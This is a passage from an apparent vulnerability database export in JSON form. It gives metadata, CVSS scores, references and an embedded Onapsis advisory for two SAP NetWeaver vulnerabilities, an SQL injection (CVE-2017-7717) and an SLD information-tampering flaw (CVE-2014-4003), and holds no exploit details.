"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201704-1563",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "as java 7.4"
},
{
"model": "customer relationship management",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "100168"
},
{
"db": "BID",
"id": "95364"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003171"
},
{
"db": "NVD",
"id": "CVE-2017-7717"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-820"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-7717"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vahagn Vardanyan (ERPScan)",
"sources": [
{
"db": "BID",
"id": "95364"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-820"
}
],
"trust": 0.9
},
"cve": "CVE-2017-7717",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-7717",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-7717",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-7717",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201704-820",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003171"
},
{
"db": "NVD",
"id": "CVE-2017-7717"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-820"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection vulnerability in the getUserUddiElements method in the ES UDDI component in SAP NetWeaver AS Java 7.4 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors, aka SAP Security Note 2356504. SAP NetWeaver is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. \nAn attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. \nSAP NetWeaver 7.40 is vulnerable; other versions may also be affected",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-7717"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003171"
},
{
"db": "BID",
"id": "100168"
},
{
"db": "BID",
"id": "95364"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-7717",
"trust": 3.0
},
{
"db": "BID",
"id": "100168",
"trust": 1.9
},
{
"db": "BID",
"id": "95364",
"trust": 1.9
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003171",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201704-820",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "100168"
},
{
"db": "BID",
"id": "95364"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003171"
},
{
"db": "NVD",
"id": "CVE-2017-7717"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-820"
}
]
},
"id": "VAR-201704-1563",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:44:38.927000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.sap.com/index.html"
},
{
"title": "SAP NetWeaver AS Java ES UDDI SQL Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=70235"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003171"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-820"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003171"
},
{
"db": "NVD",
"id": "CVE-2017-7717"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://www.securityfocus.com/bid/100168"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/95364"
},
{
"trust": 1.6,
"url": "https://erpscan.io/advisories/erpscan-17-003-sap-netweaver-7-4-getuseruddielements-sql-injection/"
},
{
"trust": 1.2,
"url": "http://www.sap.com"
},
{
"trust": 1.1,
"url": "https://erpscan.com/advisories/erpscan-17-003-sap-netweaver-7-4-getuseruddielements-sql-injection/"
},
{
"trust": 0.9,
"url": "https://launchpad.support.sap.com/#/notes/2450979"
},
{
"trust": 0.9,
"url": "https://blogs.sap.com/2017/08/08/sap-security-patch-day-august-2017/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-7717"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-7717"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2356504"
}
],
"sources": [
{
"db": "BID",
"id": "100168"
},
{
"db": "BID",
"id": "95364"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003171"
},
{
"db": "NVD",
"id": "CVE-2017-7717"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-820"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "100168"
},
{
"db": "BID",
"id": "95364"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003171"
},
{
"db": "NVD",
"id": "CVE-2017-7717"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-820"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-08T00:00:00",
"db": "BID",
"id": "100168"
},
{
"date": "2017-01-10T00:00:00",
"db": "BID",
"id": "95364"
},
{
"date": "2017-05-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-003171"
},
{
"date": "2017-04-14T18:59:01.110000",
"db": "NVD",
"id": "CVE-2017-7717"
},
{
"date": "2017-04-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201704-820"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-04-15T19:00:00",
"db": "BID",
"id": "100168"
},
{
"date": "2017-04-18T00:06:00",
"db": "BID",
"id": "95364"
},
{
"date": "2017-05-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-003171"
},
{
"date": "2021-04-20T19:02:24.910000",
"db": "NVD",
"id": "CVE-2017-7717"
},
{
"date": "2021-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201704-820"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "100168"
},
{
"db": "BID",
"id": "95364"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver AS Java of ES UDDI Component getUserUddiElements In the method SQL Injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003171"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "100168"
},
{
"db": "BID",
"id": "95364"
}
],
"trust": 0.6
}
}
var-201406-0213
Vulnerability from variot
The System Landscape Directory (SLD) in SAP NetWeaver allows remote attackers to modify information via vectors related to adding a system. SAP is the world's leading provider of enterprise management software solutions. SAP System Landscape Directory is prone to an unauthorized-access vulnerability. Successful exploits will allow attackers to gain unauthorized access and modify sensitive information, which may aid in further attacks. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Onapsis Security Advisory 2014-020: SAP SLD Information Tampering
1. Impact on Business
By exploiting this vulnerability, a remote unauthenticated attacker might be able to modify technical information about the SAP systems potentially leading to a full compromise of all business information.
Risk Level: High
2. Advisory Information
-
-- Public Release Date: 2014-06-06
-
-- Subscriber Notification Date: 2014-06-06
-
-- Last Revised: 2014-06-06
-
-- Security Advisory ID: ONAPSIS-2014-020
-
-- Onapsis SVS ID: ONAPSIS-SVS00081
-
-- Researchers: Jordan Santarsieri, Pablo Muller, Juan Perez-Etchegoyen
-
-- Initial Base CVSS v2: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
3. Vulnerability Information
-
-- Vendor: SAP
-
-- Affected Components:
- SAP System Landscape Directory (available in all SAP JAVA App Servers) (Check SAP Note 1939334 for detailed information on affected releases)
-
-- Vulnerability Class: Improper Handling of Insufficient Permissions or Privileges (CWE-280)
-
-- Remotely Exploitable: Yes
-
-- Locally Exploitable: No
-
-- Authentication Required: No
-
-- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-020
Technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability.
6. Solution
SAP has released SAP Note 1939334 which provide patched versions of the affected components.
The patches can be downloaded from https://service.sap.com/sap/support/notes/1939334.
Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks.
- 2014-02-11: SAP releases security patches. 2014-05-30: Onapsis notifies availability of security advisory to security mailing lists.
About Onapsis, Inc.
Onapsis provides innovative security software solutions to protect ERP systems from cyber-attacks. Through unmatched ERP security, compliance and continuous monitoring products, Onapsis secures the business-critical infrastructure of its global customers against espionage, sabotage and financial fraud threats.
Onapsis X1, the company's flagship product, is the industry's first comprehensive solution for the automated security assessment of SAP platforms. Being the first and only SAP-certified solution of its kind, Onapsis X1 allows customers to perform automated Vulnerability Assessments, Security & Compliance Audits and Penetration Tests over their entire SAP platform.
Onapsis is backed by the Onapsis Research Labs, a world-renowned team of SAP & ERP security experts who are continuously invited to lecture at the leading IT security conferences, such as RSA and BlackHat, and featured by mainstream media such as CNN, Reuters, IDG and New York Times.
For further information about our solutions, please contact us at info@onapsis.com and visit our website at www.onapsis.com. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) Comment: Onapsis Research Team
iEYEARECAAYFAlOR3fUACgkQz3i6WNVBcDWrjwCdFC60a5sqq2hol1xAYYt0NczH fZwAn0St6TPuqLg210wpu2LM+bTDNY2S =2YwW -----END PGP SIGNATURE-----
Securing Apache Web Server with thawte Digital Certificate In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates.
http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201406-0213",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "sap",
"scope": null,
"trust": 0.6,
"vendor": "sap",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "netweaver",
"version": null
}
],
"sources": [
{
"db": "IVD",
"id": "f7471c7c-1ed1-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-03664"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002807"
},
{
"db": "NVD",
"id": "CVE-2014-4003"
},
{
"db": "CNNVD",
"id": "CNNVD-201406-118"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-4003"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jordan Santarsieri, Pablo Muller, Juan Perez-Etchegoyen",
"sources": [
{
"db": "BID",
"id": "67923"
}
],
"trust": 0.3
},
"cve": "CVE-2014-4003",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2014-4003",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2014-03664",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "f7471c7c-1ed1-11e6-abef-000c29c66e3d",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-4003",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2014-03664",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201406-118",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "IVD",
"id": "f7471c7c-1ed1-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "f7471c7c-1ed1-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-03664"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002807"
},
{
"db": "NVD",
"id": "CVE-2014-4003"
},
{
"db": "CNNVD",
"id": "CNNVD-201406-118"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The System Landscape Directory (SLD) in SAP NetWeaver allows remote attackers to modify information via vectors related to adding a system. SAP is the world\u0027s leading provider of enterprise management software solutions. SAP System Landscape Directory is prone to an unauthorized-access vulnerability. \nSuccessful exploits will allow attackers to gain unauthorized access and modify sensitive information, which may aid in further attacks. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nOnapsis Security Advisory 2014-020: SAP SLD Information Tampering\n\n\n1. Impact on Business\n===================== \nBy exploiting this vulnerability, a remote unauthenticated attacker\nmight be able to\nmodify technical information about the SAP systems potentially leading\nto a full compromise of all business information. \n\nRisk Level: High\n\n2. Advisory Information\n=======================\n\n- -- Public Release Date: 2014-06-06\n\n- -- Subscriber Notification Date: 2014-06-06\n \n- -- Last Revised: 2014-06-06\n\n- -- Security Advisory ID: ONAPSIS-2014-020\n\n- -- Onapsis SVS ID: ONAPSIS-SVS00081\n\n- -- Researchers: Jordan Santarsieri, Pablo Muller, Juan Perez-Etchegoyen\n\n- -- Initial Base CVSS v2: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n3. Vulnerability Information\n============================\n\n- -- Vendor: SAP\n\n- -- Affected Components:\n * SAP System Landscape Directory (available in all SAP JAVA App Servers)\n (Check SAP Note 1939334 for detailed information on affected releases)\n\n- -- Vulnerability Class: Improper Handling of Insufficient Permissions\nor Privileges (CWE-280)\n\n- -- Remotely Exploitable: Yes\n\n- -- Locally Exploitable: No\n\n- -- Authentication Required: No\n\n- -- Original Advisory:\nhttp://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-020\n\n\n4. \n\n\n5. \n\nTechnical details about this issue are not disclosed at this moment with\nthe purpose of\nproviding enough time to affected customers to patch their systems and\nprotect against\nthe exploitation of the described vulnerability. \n\n\n6. Solution\n===========\n\nSAP has released SAP Note 1939334 which provide patched versions of the\naffected components. \n\nThe patches can be downloaded from\nhttps://service.sap.com/sap/support/notes/1939334. \n\nOnapsis strongly recommends SAP customers to download the related\nsecurity fixes and apply them to the affected\ncomponents in order to reduce business risks. \n\n\n7. \n2014-02-11: SAP releases security patches. \n2014-05-30: Onapsis notifies availability of security advisory to\nsecurity mailing lists. \n\n\nAbout Onapsis, Inc. \n===================\n\nOnapsis provides innovative security software solutions to protect ERP\nsystems from cyber-attacks. Through unmatched ERP security, compliance\nand continuous monitoring products, Onapsis secures the\nbusiness-critical infrastructure of its global customers against\nespionage, sabotage and financial fraud threats. \n\nOnapsis X1, the company\u0027s flagship product, is the industry\u0027s first\ncomprehensive solution for the automated security assessment of SAP\nplatforms. Being the first and only SAP-certified solution of its kind,\nOnapsis X1 allows customers to perform automated Vulnerability\nAssessments, Security \u0026 Compliance Audits and Penetration Tests over\ntheir entire SAP platform. \n\nOnapsis is backed by the Onapsis Research Labs, a world-renowned team of\nSAP \u0026 ERP security experts who are continuously invited to lecture at\nthe leading IT security conferences, such as RSA and BlackHat, and\nfeatured by mainstream media such as CNN, Reuters, IDG and New York Times. \n\nFor further information about our solutions, please contact us at\ninfo@onapsis.com and visit our website at www.onapsis.com. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\nComment: Onapsis Research Team\n\niEYEARECAAYFAlOR3fUACgkQz3i6WNVBcDWrjwCdFC60a5sqq2hol1xAYYt0NczH\nfZwAn0St6TPuqLg210wpu2LM+bTDNY2S\n=2YwW\n-----END PGP SIGNATURE-----\n\n\n------------------------------------------------------------------------\nSecuring Apache Web Server with thawte Digital Certificate\nIn this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates. \n\nhttp://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1\n------------------------------------------------------------------------\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-4003"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002807"
},
{
"db": "CNVD",
"id": "CNVD-2014-03664"
},
{
"db": "BID",
"id": "67923"
},
{
"db": "IVD",
"id": "f7471c7c-1ed1-11e6-abef-000c29c66e3d"
},
{
"db": "PACKETSTORM",
"id": "126986"
}
],
"trust": 2.7
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-4003",
"trust": 2.9
},
{
"db": "BID",
"id": "67923",
"trust": 1.9
},
{
"db": "PACKETSTORM",
"id": "126986",
"trust": 1.1
},
{
"db": "SECUNIA",
"id": "58633",
"trust": 1.0
},
{
"db": "CNVD",
"id": "CNVD-2014-03664",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201406-118",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002807",
"trust": 0.8
},
{
"db": "FULLDISC",
"id": "20140606 [ONAPSIS SECURITY ADVISORY 2014-020] SAP SLD INFORMATION TAMPERING",
"trust": 0.6
},
{
"db": "IVD",
"id": "F7471C7C-1ED1-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "f7471c7c-1ed1-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-03664"
},
{
"db": "BID",
"id": "67923"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002807"
},
{
"db": "PACKETSTORM",
"id": "126986"
},
{
"db": "NVD",
"id": "CVE-2014-4003"
},
{
"db": "CNNVD",
"id": "CNNVD-201406-118"
}
]
},
"id": "VAR-201406-0213",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "f7471c7c-1ed1-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-03664"
}
],
"trust": 1.07111164
